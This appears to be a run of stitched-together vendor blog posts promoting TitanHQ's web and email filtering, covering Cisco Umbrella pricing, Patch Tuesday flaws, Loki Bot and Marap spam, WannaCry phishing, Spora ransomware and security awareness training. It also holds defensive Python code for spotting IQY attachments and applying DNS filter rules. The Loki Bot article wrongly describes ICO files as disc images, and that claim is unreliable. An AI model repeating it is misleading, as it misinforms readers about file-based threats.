Rather than leave things to chance and hope your employees obey the rules and recognize all threats in time, you can implement a content filtering solution such as a DNS filter. A DNS filter requires no hardware purchases nor software downloads. You just reconfigure your DNS and point it to the provider of your DNS filtering service and apply your content controls.
All content filtering takes place in the cloud, there will be no latency, and filtering will take place without any content being downloaded. You can control the categories of content that can be accessed and, if rules are broken by employees, they will be directed to a block page and no harm will be done. You can run reports on web usage, apply controls to conserve bandwidth, and perhaps most importantly, you can prevent employees from visiting malicious websites and can block malware and ransomware downloads. Without this additional security layer, your business will be at risk.
Is It Worth Paying the Cisco Umbrella Price?
We are not going to try to convince you not to look at Cisco Umbrella, as it is an accomplished DNS filtering solution that is suitable for many enterprises and SMBs. The product will certainly protect your business from web-based threats and will allow you to enforce your internet policies. However, there is a but. If you are already using Cisco Umbrella or have made enquiries about the solution, you will be aware that the product comes at a considerable cost.
Cisco Umbrella is not a one-size-fits-all solution. Cisco caters to a range of different customers, from small businesses to large enterprises and packages have been devised accordingly. The most basic offering is DNS Security Essentials, which is a bare bones DNS filtering package that blocks malware and ransomware downloads and allows you to enforce your internet policies. However, there are many important features lacking that most SMBs will feel are important. For instance, now that most websites have moved over to HTTPS, connections to those sites are encrypted. You therefore need to decrypt, inspect, and then re-encrypt that traffic. The basic package does not include this feature. Decryption and inspection of all SSL traffic is only available in the top-level package.
DNS Security Advantage is the second package offered, which provides more features such as greater insight for investigations, file threat intelligence, and some other tools. At the top end is the comprehensive Secure Internet Gateway Essentials package, which offers enterprise-grade DNS filtering with a host of features required by enterprises with a huge workforce. For most SMBs, the top package will offer a host of features that will most likely not be used. Unfortunately, the lowest level package is missing some important features that really are required by many SMBs.
What is the Cisco Umbrella Cost Per User?
So, how much does Cisco Umbrella cost? This is a key consideration for SMBs as they are likely to have limited budgets. They need to pay for several layers of cybersecurity to block the threats they are most likely to encounter. Spend top dollar on one solution and it is likely to mean less can be spent on other important security controls.
At the standard level, the Cisco Umbrella cost per user is $2.20 per month, which is considerably more than Cisco Umbrella alternative options such as WebTitan. For 100 users, Cisco Umbrella will cost $2,640 per year and that price does not include support, which Cisco considers an optional extra. If you opt for one of the more advanced packages, that price will increase considerably.
The standard price for a Cisco Umbrella alternative is around $1.00 to $1.50 per user per month, but here at TitanHQ we have a highly competitive pricing policy and can provide you with a Cisco Umbrella alternative for just $0.90 per user per month. That will save you $1,560 per year, based on 100 users.
There is More to Consider than the Cost of Cisco Umbrella Alone
Cost is not the only consideration, although it is certainly important. You will want to ensure that your DNS filter allows you to control content easily and it must provide protection against web-based threats. So, does opting for a Cisco Umbrella alternative reduce the protection you will get? Actually, you can pay less and improve protection, have an easier to use product, with better reporting, and less complexity.
At TitanHQ we have a totally transparent and flexible pricing policy and provide the same, high level of protection for everyone. All customers benefit from full SSL filtering to ensure that HTTPS traffic is inspected and analyzed, and all customers get industry-leading customer support at no extra cost.
WebTitan is also loved by users who rate it highly for ease of setup, ease of use, ease of admin, and for the quality of support provided. This can be seen on review sites such as G2 Crowd, as detailed below.
The Leading DNS Filtering Solution for MSPs Serving the SMB Market
TitanHQ is the global leader in cloud-based email and web security solutions for the MSP that services the SMB market. WebTitan has been designed to be ideal for MSPs and includes a host of features not offered by Cisco. In contrast to all packages of Cisco Umbrella, we offer a range of hosting options. You can even host in your own environment, something that is important for many MSPs. You can also have WebTitan in white label form, ready to take your own branding, another big plus for MSPs. The solution is also easy to integrate seamlessly into your own environment thanks to a suite of APIs.
Find out More About Our Cisco Umbrella Alternative Today!
Our sales staff will be happy to explain the benefits of WebTitan over Cisco Umbrella and schedule a product demonstration to show you how easy the solution is to use and integrate into your own environment. If you would like to try WebTitan before committing, you can also take advantage of our free 14-day trial. For more information, give the TitanHQ team a call today.
Microsoft has addressed 27 critical flaws this Patch Tuesday, including a Microsoft .Net Framework flaw that is being actively exploited to download Finspy surveillance software on devices running Windows 10.
Finspy is genuine software created by the UK-based Gamma Group, which is used by governments globally for cyber-surveillance. The software has been downloaded in at least two attacks in the past few months according to FireEye experts; the most recent attack leveraged the Microsoft .Net Framework flaw.
The attack begins with a spam email including a malicious RTF file. The document uses the CVE-2017-8759 vulnerability to execute arbitrary code, which installs and executes a VB script including PowerShell commands, which in turn installs the malicious payload, which includes Finspy.
FireEye suggests at least one attack was completed by a nation-state against a Russian target; however, FireEye experts also believe other actors may also be using the vulnerability to conduct attacks.
According to a blog post last Tuesday, the Microsoft .Net Framework flaw has been detected and mitigated. Microsoft strongly recommends downloading the latest update promptly to minimize exposure. Microsoft says the flaw could permit a malicious actor to take full control of an impacted system.
Several Bluetooth flaws were discovered and shared on Tuesday by security company Armis. The flaws impact billions of Bluetooth-enabled devices around the globe. The eight flaws, referred to as BlueBorne, could be used to carry out man-in-the-middle attacks on devices via Bluetooth, sending traffic to the attacker’s computer. The bugs exist in Windows, iOS, Android and Linux.
In order to target the flaws, Bluetooth would need to be turned on for the targeted device, although it would not be necessary for the device to be in discoverable mode. A hacker could use the flaws to connect to a device – a TV or speaker for example – and start a connection to a computer without the user’s knowledge. In order to carry out the attack, it would be necessary to be in relatively close physical proximity to the targeted device.
In addition to intercepting communications, a hacker could also take full control of a device and steal data, download ransomware or malware, or perform other malicious activities such as placing the device on a botnet. Microsoft addressed one of the Bluetooth driver spoofing bugs – CVE-2017-8628 – in the latest round of updates.
One of the most pressing updates is for a remote code execution vulnerability in NetBIOS (CVE-2017-0161). The vulnerability impacts both servers and work devices. While the vulnerability is not thought to be currently exploited in the wild, it is of note as it can be exploited just by sending specially crafted NetBT Session Service packets.
The Zero Day Initiative (ZDI) said the flaw “is practically wormable within a Local Area Network. This could also target many virtual clients if the guest OSes all connect to the same (virtual) LAN.”
Overall, 81 updates have been published by Microsoft this Patch Tuesday. Adobe has addressed eight flaws, including two critical memory corruption bugs (CVE-2017-11281, CVE-2017-11282) in Flash Player, a critical XML parsing flaw in ColdFusion (CVE-2017-11286) and two ColdFusion remote code execution flaws (CVE-2017-11283, CVE-2017-11284) relating to deserialization of untrusted data.
In the United States, healthcare industry phishing campaigns have been to blame for exposing the protected health records of well in excess of 90 million Americans over the course of the past year. That’s more than 28% of the population of the United States.
This week, another case of healthcare sector phishing has come to light following the announcement of Connecticut’s Middlesex Hospital data breach. The hospital saw that four of its employees responded to a phishing email, resulting in their email account login details being sent to a hacker’s command and control center. In this case the damage inflicted by the phishing attack was limited, and only 946 patients had their data exposed. Other healthcare groups have not been nearly so fortunate.
Our industry news section includes a wide range of news items of particular relevance to the cybersecurity sector and managed service providers (MSPs).
This section also includes details of the most recent white papers and research studies relating to malware, ransomware, phishing and data breaches. These articles allow some insight into the general state of cybersecurity, the industries currently most heavily targeted by cybercriminals, and figures and statistics for your own reports.
Cybercriminals use massive spam campaigns designed to infect as many computers as they can. These attacks are random, using email addresses stolen in large data breaches such as the cyberattacks on LinkedIn, MySpace, Twitter and Yahoo. However, highly targeted attacks are on the up, with campaigns geared to specific sectors. These industry-specific cyberattacks and spam and malware campaigns are covered in this section, along with possible mitigations for reducing the danger of a successful attack.
This category is therefore important for organizations in the education, healthcare, and financial services sectors – the most commonly attacked industries according to the latest security reports.
The articles cover current campaigns, spam email identifiers and details of the social engineering tactics used to trick end users and gain access to corporate networks. By using the advice in these articles, it may be possible to stop similar attacks.
This network security news section contains a variety of articles about safeguarding networks and blocking cyberattacks, ransomware and malware installations. This section also includes articles on recent network security breaches, alerting organizations to the latest attack trends being used by hackers.
Layered cybersecurity defenses are vital due to the increase in hacking incidents and the explosion in ransomware and malware variants over the past 24 months. Organizations can address the threat by investing in new security defenses such as next generation firewalls, endpoint defense systems, web filtering solutions and advanced anti-malware and antivirus defenses.
While much investment goes on proven solutions that have been highly resilient in the past, many cybersecurity solutions, antivirus software for example, are not as effective as they were previously. In order to keep pace with hackers and cybercriminals and get ahead of the curve, organizations should consider using a wide variety of new cybersecurity solutions to block network intrusions, stop data breaches and improve protection against the most recent malware and ransomware threats.
This category includes information and guidance on different network security solutions that can be adopted to enhance network security and ensure networks are not targeted by hackers and infected with malicious software.
The TitanHQ team is on the road once again this fall and will be attending some of the biggest and best Managed Service Provider (MSP) conferences and roadshows in Europe and the United States.
The fall schedule of trade shows got underway in Chicago at the Taylor Business Group BIG Conference, followed by Cloudsec2019 in London. September also sees the team attend Datto Dublin on September 17 and the MSH Summit in London on September 18.
If you have not already booked up to attend these events, there will be plenty more opportunities to meet with the TitanHQ team to talk about email security, web security, and email archiving this fall.
TitanHQ will be attending the following MSP-focused events in September, October, and November:
September 17, 2019
September 18, 2019
October 6-10, 2019
October 7-8, 2019
CompTIA EMEA Show
October 16-17, 2019
Canalys Cybersecurity Forum
October 21-23, 2019
October 30, 2019
MSH Summit North
October 30, 2019
IT Nation Evolve (HTG 4)
October 30, 2019
IT Nation Connect
November 5-7, 2019
The above events give MSPs, ISPs, and VARs the opportunity to meet with the TitanHQ team to discuss the full range of MSP-focused cybersecurity solutions, arrange a product demonstration to see the solutions in action, and discover how to integrate the solutions into your client management systems.
TitanHQ first started developing cybersecurity solutions for SMBs in 1999. While many cybersecurity firms have recently started offering their solutions to MSPs, TitanHQ saw the need to do things a little differently and ensured MSPs were considered from the very start.
TitanHQ has developed a suite of cybersecurity solutions that incorporate all the features demanded by MSPs. With TitanHQ solutions, MSPs can not only meet the needs of their customers and greatly improve their security postures, the solutions save MSPs money by reducing the amount of time they have to spend fighting fires and resolving malware infections and remediating responses to phishing emails. Less time on support and engineering allows MSPs to channel their resources into generating more profit.
The roadshows, conferences, trade shows, and other MSP-focused events give prospective MSP clients the opportunity to quiz TitanHQ about its products and discover how easily the solutions can be incorporated into MSPs technology stacks and rolled out to customers.
If you have not heard of TitanHQ, have yet to incorporate SpamTitan, WebTitan, or ArcTitan into your service stack, or have unanswered questions about spam filtering, web filtering, and email archiving in the cloud, the TitanHQ team is here to help.
If you do not feel that you can find the time to attend one of the above events, contact the TitanHQ team by phone or email to book a product demonstration, get your questions answered, and sign up for a free trial of any or all of TitanHQ’s email security, web security, and email archiving solutions for MSPs.
If you are attending an event, be sure to pay TitanHQ a visit and feel free to contact TitanHQ in advance of the conference to book an appointment or to get answers to your questions:
Rocco Donnino, Executive Vice President-Strategic Alliances, LinkedIn
Eddie Monaghan, MSP Alliance Manager, LinkedIn
Marc Ludden, MSP Alliance Manager, LinkedIn
Dryden Geary, Marketing Director
A spam email campaign is being conducted that targets corporate email accounts to distribute Loki Bot malware. Loki Bot malware is a data stealer capable of obtaining passwords stored in browsers, email account passwords, FTP client logins, cryptocurrency wallet passwords, and passwords for messaging apps.
Along with stealing saved passwords, Loki Bot malware has keylogging capabilities and is possibly capable of installing and running executable files. All data captured by the malware is transferred to the hacker’s C2 server.
Kaspersky Lab researchers identified an increase in email spam activity focusing on corporate email accounts, with the campaign discovered to be used to spread Loki Bot malware. The malware was sent hidden in a malicious email attachment.
The intercepted emails included an ICO file attachment. ICO files are duplicates of optical discs, which are usually mounted in a virtual CD/DVD drive to open. While specialist software can be used to open these files, the majority of modern operating systems have the ability to access the contents of the files without the need for any extra software.
In this instance, the ICO file includes Loki Bot malware and double-clicking on the file will result in the malware being downloaded on operating systems that support the files (Vista and later).
It is relatively unusual for ICO files to be used to deliver malware, although not unheard of. The unfamiliarity with ICO files for malware delivery may see end users try to open the files.
The campaign included a wide variety of lures including fake purchase orders, speculative enquiries from companies including product lists, fake invoices, bank transfer details, payment requests, credit alerts and payment confirmations. Well-known businesses such as Merrill Lynch, Bank of America, and DHL were spoofed in some of the emails.
A different and unrelated spam email campaign has been discovered that is using IQY files to deliver a new form of malware known as Marap. Marap malware is an installer capable of downloading a variety of different payloads and additional modules.
During installation, the malware fingerprints the system and gathers data such as username, domain name, IP address, hostname, language, country, Windows version, details of Microsoft .ost files, and any anti-virus solutions detected on the infected computer. What happens next depends on the system on which it is downloaded. If the system is of particular interest, it is earmarked for a more extensive compromise.
Four separate campaigns involving millions of messages were discovered by experts at Proofpoint. One campaign included an IQY file as an attachment, one included an IQY file within a zip file and a third used an embedded IQY file in a PDF file. The fourth used a Microsoft Word document including a malicious macro. The campaigns seem to be targeting financial institutions.
IQY files are used by Excel to download web content straight into spreadsheets. They have been used in many spam email campaigns in recent weeks to install a range of different malware variants. The file type is proving popular with cybercriminals because many anti-spam solutions fail to recognize the files as malicious.
Since most end users would not have any need to open ICO or IQY files, these file types should be placed on the list of blocked file types in email spam filters to prevent them from being delivered to end users’ inboxes.
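One way to apply that recommendation at a mail gateway, shown for IQY files as an added example (it is not code from TitanHQ or any product): a Python check that flags IQY attachments by extension, inside zip files, and by content when the file has been renamed. The sample message, the `BLOCKED_EXTENSIONS` set and all function names are constructed for the illustration, and the PDF-embedded variant is not covered.

```python
import io
import os
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage

BLOCKED_EXTENSIONS = {".iqy"}   # assumption: extend with other types users never need
MAX_ZIP_MEMBERS = 200           # stop walking oversized archives
SNIFF_BYTES = 4096              # only the head of a file is needed for the content check


def looks_like_iqy(data: bytes) -> bool:
    """Content check: a web query file is text whose first lines are WEB, a version, a URL."""
    text = data[:SNIFF_BYTES].lstrip(b"\xef\xbb\xbf").decode("latin-1")
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    return (len(lines) >= 3
            and lines[0].upper() == "WEB"
            and lines[1].isdigit()
            and lines[2].lower().startswith(("http://", "https://")))


def check_file(where: str, name: str, head: bytes, findings: list) -> None:
    """Record a finding if the name has a blocked extension or the content is a web query."""
    ext = os.path.splitext(name)[1].lower()
    if ext in BLOCKED_EXTENSIONS:
        findings.append((where, name, "blocked extension"))
    elif looks_like_iqy(head):
        findings.append((where, name, "IQY content under another name"))


def scan_zip(archive_name: str, data: bytes, findings: list) -> None:
    """Apply the same checks to each member of a zip attachment (one level deep)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist()[:MAX_ZIP_MEMBERS]:
            if info.is_dir():
                continue
            head = b""
            if not info.flag_bits & 0x1:          # bit 0 set means the member is encrypted
                with zf.open(info) as member:
                    head = member.read(SNIFF_BYTES)
            check_file("zip:" + archive_name, info.filename, head, findings)


def scan_message(raw: bytes) -> list:
    """Return (location, filename, reason) tuples for attachments to quarantine."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        check_file("attachment", name, data, findings)
        if zipfile.is_zipfile(io.BytesIO(data)):
            scan_zip(name, data, findings)
    return findings


def build_sample() -> bytes:
    """Constructed test message: a bare .iqy, a zipped .iqy and an .iqy renamed to .txt."""
    iqy = b"WEB\r\n1\r\nhttp://query.example.invalid/data\r\n"
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Constructed sample"
    msg.set_content("See attached.")
    msg.add_attachment(iqy, maintype="application", subtype="octet-stream",
                       filename="report.iqy")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/prices.IQY", iqy)
        zf.writestr("docs/readme.txt", "nothing to see")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="docs.zip")
    msg.add_attachment(iqy, maintype="application", subtype="octet-stream",
                       filename="notes.txt")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in scan_message(build_sample()):
        print(finding)
```

The content check matters because an extension blocklist alone misses a web query file that has been given a harmless-looking name.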
Hackers are using WannaCry phishing emails to conduct campaigns that exploit the fear surrounding the global network worm attacks.
An email campaign has been discovered in the United Kingdom, with BT customers being targeted. The hackers have been able to spoof BT domains and made their WannaCry phishing emails look very realistic. BT branding is used, the emails are well composed and they claim to have been sent by Libby Barr, Managing Director, Customer Care at BT. A quick search for her name on Google will reveal she is who she claims to be. The WannaCry phishing emails are realistic, cleverly put together, and are likely to trick many customers.
The emails claim that BT is working on enhancing its security after the massive ransomware campaign that impacted over 300,000 computers in 150 countries on May 12, 2017. In the UK, 20% of NHS Trusts were impacted by the incident and had data encrypted and services severely disrupted by the ransomware attacks. If you live in the UK, it would have been extremely hard to avoid the news of the attacks and the extent of the damage they have inflicted.
The WannaCry phishing emails provide a very good reason for taking quick action. BT is offering a security upgrade to stop its customers from being harmed by the attacks. The emails claim that in order to keep customers’ sensitive data secure, access to certain features has been turned off on BT accounts. Customers are told that to restore their full BT account functionality they need to confirm the security upgrade by selecting the upgrade box contained in the email.
Of course, visiting the link will not lead to a security upgrade being applied. Instead, customers are asked to disclose their login credentials to the hackers.
Other WannaCry phishing emails are likely to be issued claiming to be originating from other broadband service providers. Similar campaigns could be used to quietly install malware or ransomware.
Hackers often take advantage of global news events that are garnering a lot of media interest. During the Olympics there were many Olympic-themed spam emails. Phishing emails were also prevalent during the U.S. presidential elections, the World Cup, the Zika Virus epidemic, and following every major news story.
It is vital never to click on links sent in emails from people you do not know, to be extremely careful about visiting links sent from people you do know, and to assume that any email you receive could be a phishing email or other malicious message.
Just one phishing email sent to a member of staff can lead to a data breach, or an email or network compromise. It is therefore crucial for employers to be careful. Employees should be provided with phishing awareness training and taught the giveaway signs that emails are not authentic. It is also vital that an advanced spam filtering solution is employed to stop most phishing emails from landing in end users’ inboxes.
TitanHQ is here to help with that. Get in touch with the team now to see how SpamTitan can protect your business from phishing, malware and ransomware campaigns.
A new and very dangerous ransomware threat called Spora has been discovered.
Locky and Samas ransomware have certainly been major headaches for IT departments. Both forms of ransomware have a host of smart features designed to prevent detection, grow infections, and inflict the most damage possible, leaving companies with little option but pay the ransom demand.
However, there is now a new ransomware threat to address, and it could well be even bigger than Locky and Samas. Luckily, the ransomware authors only seem to be targeting Russian users, but that is likely to change. While a Russian version has been used in hacking attacks so far, an English language version has now been created. Spora ransomware attacks will soon be a global issue.
A great deal of time and effort has gone into producing this very dangerous new ransomware variant and a decryptor is unlikely to be created due to the way that the ransomware encrypts data.
Unlike many new ransomware variants that rely on a Command and Control server to receive instructions, Spora ransomware can encrypt files even if the user is offline. Closing down Internet access will not stop an infection. It is also not possible to restrict access to the C&C server to prevent infection.
Earlier ransomware variants have been created that can encrypt without C&C communication, although unique decryption keys are not necessary. That means one key will unlock all infections. Spora ransomware on the other hand needs all victims to use a unique key to unlock the encryption. A hard-coded RSA public key is used to create a unique AES key for every user. That process happens locally. The AES key is then used to encrypt the private key from a public/private RSA key pair set up with each victim, without C&C communications. The RSA key also encrypts the separate AES keys for each user. Without the key supplied by the hackers, you cannot unlock the encryption.
This complex encryption process only represents part of what makes Spora ransomware unique. Unlike many other ransomware variants, the hackers have not set the ransom amount. This gives the hackers a degree of flexibility and, importantly, this process occurs automatically. Security experts believe the degree of automation will see the ransomware provided on an affiliate model.
The flexibility allows companies to be charged a different amount than an individual. The ransom set is calculated based on the extent of the infection and types of files that have been encrypted. Since Spora ransomware gathers data on the user, when contact is made to pay the ransom, amounts could easily be changed.
When victims visit the hacker’s payment portal to pay the ransom, they must supply the key file that is set up by the ransomware. The key file contains a range of data on the user, including details of the campaign used. The hackers can therefore carefully monitor infections and campaigns. Those campaigns that are successful and result in more payments can then be repeated. Less effective campaigns can be brought to an end.
At present there are a number of different payment options, including something quite different. Victims can pay to unlock the encryption, or pay extra to avoid future attacks, essentially being given immunity.
Emsisoft experts who have analyzed Spora ransomware say it is far from a run-of-the-mill variant that has been quickly thrown together. It is the work of a highly knowledgeable group. The encryption process contains no weaknesses – uncommon for a new ransomware variant – the design of the HTML ransom demand and the payment portal is highly sophisticated, and the payment portal also contains a chat option to allow communication with the hackers. This degree of professionalism only comes from a lot of investment and a great deal of work. This threat is unlikely to disappear soon. In fact, it could prove to be one of the most serious threats in 2017 and into the future.
DNS based web filtering takes advantage of cloud based technology to provide an Internet content filtering service as powerful as hardware or software solutions, but without their capital investment and high maintenance costs. As with most cloud-based technologies, DNS based web filtering software is convenient, reliable, and extremely scalable.
Any Internet filtering solution has to have SSL inspection so that it can examine the content of encrypted web pages. Whereas SSL inspection can drain CPU resources and memory when included in hardware and software solutions, with DNS based web filtering the inspection process is done in the cloud – thus enhancing network operations.
How DNS Based Web Filtering Operates
In order to filter Internet content using a Domain Name Server (DNS), you need to register for a web filtering service. The service provider gives you a browser-based account where you log in, submit your external IP address and set your web filtering policy. Then you just redirect your DNS system settings to the service provider's web filtering service.
If you have a range of web filtering policies for different positions within your company, tools are available to link management tools such as LDAP and Active Directory with the web filtering service. It is also possible to put in place a DNS proxy for per user reporting and select from a variety of predefined reports. Alternatively, it is a simple process to set up your own bespoke reports.
Due to the way in which DNS based web filtering works, it can be applied with every type of network and operating system. Multiple locations and domains can be managed from one management portal, and – due to the SSL inspection process being conducted in the cloud – end users will not suffer the latency usually associated with hardware and software solutions.
Highly Granular Controls Maximize Your Security Strength
The most commonly given reasons for adding an Internet content filter are to safeguard the company from web-borne dangers and to enforce acceptable use policies. DNS based web filtering achieves both these aims by deploying a three-tier mechanism for filtering Internet content. The three tiers work in tandem to maximize the company's defenses and prevent users accessing material that could be an obstruction to productivity or cause offense.
The first tier includes SURBL and URIBL filters. These are commonly referred to as blacklists and they compare each request to view a website against IP addresses from which malware downloads, phishing attacks and spam emails are known to have been initiated. When matches are located, the request to visit the website is denied. Blacklists are supplied and updated by your service provider.
Behind the blacklists, category filters and keyword filters make up the second and third lines of defense. These can be applied by system administrators to stop users visiting websites within some categories (social networking for example), or those likely to include material that would be inappropriate for an office environment. Keyword filters can also be used to prevent users accessing specific content or web applications, or downloading files with extensions most linked with malware.
Exemptions to general policies can be set up by user or user group if access to a website or web application is required by a certain department within the company. For example, you may not want your employees to engage in personal Internet banking during working hours, but it is likely crucial that your finance department has access to online banking services. Similar exemptions could be established (say) if your marketing department needed access to the company's Facebook or Twitter accounts.
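The three tiers and the group exemptions described above can be expressed as a small decision function. This is an added Python example, not WebTitan's implementation: the domain lists, category names, group names and function names are all constructed, it assumes a blacklist hit cannot be overridden by an exemption, and it applies keywords to the hostname only because that is all a DNS query exposes.

```python
from dataclasses import dataclass, field

# Constructed sample data; a real service supplies and updates these lists.
BLACKLIST = {"malware-drop.example", "phish-login.example"}
CATEGORIES = {
    "bank.example": "online-banking",
    "social.example": "social-networking",
    "news.example": "news",
}
BLOCKED_KEYWORDS = ("casino", "torrent")


@dataclass
class Policy:
    blocked_categories: set
    # group name -> categories that group may reach despite the general policy
    exemptions: dict = field(default_factory=dict)


SAMPLE_POLICY = Policy(
    blocked_categories={"online-banking", "social-networking"},
    exemptions={"finance": {"online-banking"}, "marketing": {"social-networking"}},
)


def candidate_names(host: str) -> list:
    """Return the queried name and its parent domains, most specific first."""
    labels = host.lower().rstrip(".").split(".")
    return [".".join(labels[i:]) for i in range(max(len(labels) - 1, 1))]


def decide(host: str, group: str, policy: Policy = SAMPLE_POLICY) -> tuple:
    """Evaluate one DNS query and return (verdict, reason)."""
    names = candidate_names(host)

    # Tier 1: blacklist. Assumption: no group exemption can override it.
    for name in names:
        if name in BLACKLIST:
            return ("block", "blacklist:" + name)

    # Tier 2: category filter, with per-group exemptions.
    reason = "default"
    category = next((CATEGORIES[n] for n in names if n in CATEGORIES), "uncategorized")
    if category in policy.blocked_categories:
        if category not in policy.exemptions.get(group, set()):
            return ("block", "category:" + category)
        reason = "exempt:" + category

    # Tier 3: keyword filter. A DNS filter sees only the hostname, so match on that.
    for keyword in BLOCKED_KEYWORDS:
        if keyword in names[0]:
            return ("block", "keyword:" + keyword)

    return ("allow", reason)


if __name__ == "__main__":
    for host, group in [("www.bank.example", "sales"), ("www.bank.example", "finance"),
                        ("cdn.malware-drop.example", "finance")]:
        print(host, group, decide(host, group))
```

Matching on parent domains means a subdomain of a blacklisted or categorized site inherits the same verdict, which is the behaviour to confirm when testing a real policy.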
DNS Based Web Filtering Provided by SpamTitan
SpamTitan offers businesses a range of DNS based web filtering solutions – WebTitan Cloud for companies with fixed networks, and WebTitan Cloud for WiFi for companies providing a wireless service to end users. Both DNS based web filtering solutions have been created with maximum ease of use, maximum granularity and maximum security from web-borne threats.
Along with being versatile and effective DNS based web filtering solutions, both WebTitan Cloud and WebTitan Cloud for WiFi include many features to safeguard your company. Both solutions have best-in-class malicious URL detection, phishing protection and antivirus software – all of which is updated automatically. Both also update our filtering mechanisms in real time – including the categorization of new websites as they are released.
The service grows in line with your company, so you never have to worry about registering new users or even multiple networks. WebTitan Cloud and WebTitan Cloud for WiFi are infinitely scalable, with no bandwidth limits, and no latency problems. Unless you advise them, your users will never know they are being safeguarded from web-borne threats until they try to visit an unsafe or inappropriate website.
Although many reports seem to indicate that email spam is dropping, email spam and botnet infection is still a major danger for most U.S. organizations and people – with criminal practices netting hacking gangs billions of dollars every year.
Estimating the infection levels and the amount of spam being sent was one of the chief aims of the Messaging, Malware and Mobile Anti-Abuse Working Group (M3AAWG). M3AAWG is a global network tasked with promoting cybersecurity best practices and tackling organized internet crime. M3AAWG was created 10 years ago by a number of leading internet service providers, with the goal of enhancing collaboration and sharing knowledge to make it more complicated for criminals to spam account users. By reducing the impact of email spam on individuals and organizations, ISPs would be able to better protect users, their email platforms and their reputations.
It was noticed that quantifying email spam and botnet infection levels was an extremely difficult task; one that was only possible with collaboration between internet service providers. Arising out of this collaboration, the organization has produced reports on the global state of email spam and botnet infection. Its latest analysis suggests that approximately 1% of computer users are part of a botnet network.
The data gathered by M3AAWG involved assessing 43 million email subscribers in the United States and Europe. The data analysis showed that ISPs normally block from 94% to 99% of spam emails. The organization’s report suggests that overall, ISPs do a good job of blocking email spam.
The figures look good but, taking into account the huge scale of email spam, billions of spam emails are still making it through to users, with financial organizations and other companies now being regularly targeted with spam and malware.
Email spammers are well backed financially, and criminal organizations are using email spam as a means of getting hold of tens of billions of dollars annually from internet fraud. Spam emails are sent to phish for sensitive information, such as bank account information, credit card details and other highly sensitive data including Social Security numbers. Accounts can be cleaned out, credit cards maxed out and data used to carry out identity theft, racking up tens of thousands of dollars of debts in the victims’ names.
In previous years, email spammers were dedicated to sending emails randomly to accounts with offers of cheap Rolexes, Viagra, potential brides and the opportunity to claim an inheritance from a long-lost relative. Currently, spammers have realized there are far greater rewards to be gained, and emails are now sent containing links to malware-infected websites which can be used to gain access to users’ PCs, laptops and smartphones, gaining access to highly sensitive data or locking devices and seeking ransoms.
Some emails may still be sent manually, but the majority are sent via botnets: networks of infected machines that can be used to send huge volumes of spam emails, spread malware or organize increasingly complex attacks on individuals and organizations. The botnets are available for rental, with criminals able to rent botnet time and use them for any number of tasks.
A large number of attacks are now coming from countries where there is little regulation and a very low risk of the perpetrators being caught. African states, as well as Indonesia and the Ukraine, house huge volumes of scammers. They have even established call centers to deal with the huge amount of enquiries from criminals seeking botnet time to carry out phishing and spamming campaigns. Tackling the issue at the source is difficult, with corruption rife in the countries where the perpetrators live.
However, it is possible to lower spam levels, and the danger of staff members being tricked by a scam or downloading malware, by installing a robust email spam filter, reducing the potential for spam emails and phishing campaigns getting through to individual accounts. A report from Verizon showed that 23% of users view phishing emails and 11% open attachments and visit links included. Making sure that these emails do not reach users is therefore one of the most successful methods of defense against these attacks.
Due to the ever evolving and more intricate nature of hacking, spamming and the activity of cyber criminals, it is now vital that all companies, groups and organizations have an effective security awareness program and make sure all employees, staff and workers know how to recognize email threats.
Threat actors are now creating very sophisticated tactics to download malware and ransomware and to obtain login credentials, and email is the attack vector of choice. Companies are being targeted and it will only be a matter of time before a malicious email is delivered to a worker’s inbox. It is therefore crucial that employees are trained how to identify email threats and told how they should respond when a suspicious email lands in their inbox.
If security awareness training is not made available for staff then there will be a huge hole in your security defenses. To assist you in getting back on the right track, we have listed some vital elements of an effective security awareness strategy.
Important Elements of a Strong Security Awareness Program
Have C-Suite Involved
One of the most vital starting points is to see to it that the C-Suite is on board. With board involvement you are likely to be able to dedicate larger budgets for your security training program and it should be simpler to get your plan adopted and followed by all departments in your organization.
In practice, getting the backing of executives to support a security awareness program can be tricky. One of the most effective ways to increase the chance of success is to clearly explain the importance of developing a security culture and to back this up with the financial advantages that come from having a strong security awareness program. Provide data on the extent to which businesses are being hit, the volume of phishing and malicious emails being sent, and the money that other businesses have had to spend to address email-based attacks.
The Ponemon Institute has completed several major surveys and provides annual reports on the expense of cyberattacks and data breaches and is a good source for facts and figures. Security awareness training companies are also good sources of figures. Current data indicates the benefit of the program and what you require to ensure it is a success.
Get Other Departments On Board
The IT department should not be the only one responsible for developing a strong security awareness training program. Other departments can supply help and may be able to offer additional materials. Try to get the marketing department, human resources, the compliance department and privacy officers to support this. Those outside of the security team may have some valuable input not only in terms of content but also on how to provide the training to get the best results.
Create a Continuous Security Awareness Strategy
A one-time classroom-based training session conducted once annually may have once been enough, but due to the rapidly changing threat landscape and the volume of phishing emails now being sent, an annual training session is no longer adequate.
Training should be conducted as an ongoing process provided during the year, with up-to-date information included on present and emerging threats. Each employee is different, and while classroom-based training sessions work for some, they do not work for all employees. Create a training program using a variety of training methods including annual classroom-based training sessions, constant computer-based training sessions, and use posters, games, newsletters, and email alerts to keep security issues to the fore of workers’ minds.
Provide Incentives and Gamification
Reward individuals who have finished training, alerted the group to a new phishing threat, or have scored well in security awareness training and tests. Try to establish competition between departments by publishing details of departments that have performed very well and have the highest percentage of employees who have finished training, have reported the most phishing threats, scored the highest in tests, or have correctly identified the most phishing emails in a round of phishing simulations.
Security awareness training should ideally be interesting. If the training is fun, employees are more likely to want to participate and retain knowledge. Use gamification methods and choose security awareness training providers that offer interesting and engaging content.
Test Knowledge with Phishing Email Simulations
You can conduct training, but unless you test your employees’ security awareness you will not know how effective your training program has been and if your staff have been paying attention.
Before you begin your training program it is important to have a baseline against which you can gauge success. This can be achieved using security questionnaires and completing phishing simulation exercises.
Running phishing simulation exercises using real-world examples of phishing emails after training has been completed will highlight which employees are security titans and which need further training. A failed phishing simulation exercise can be transformed into a training opportunity.
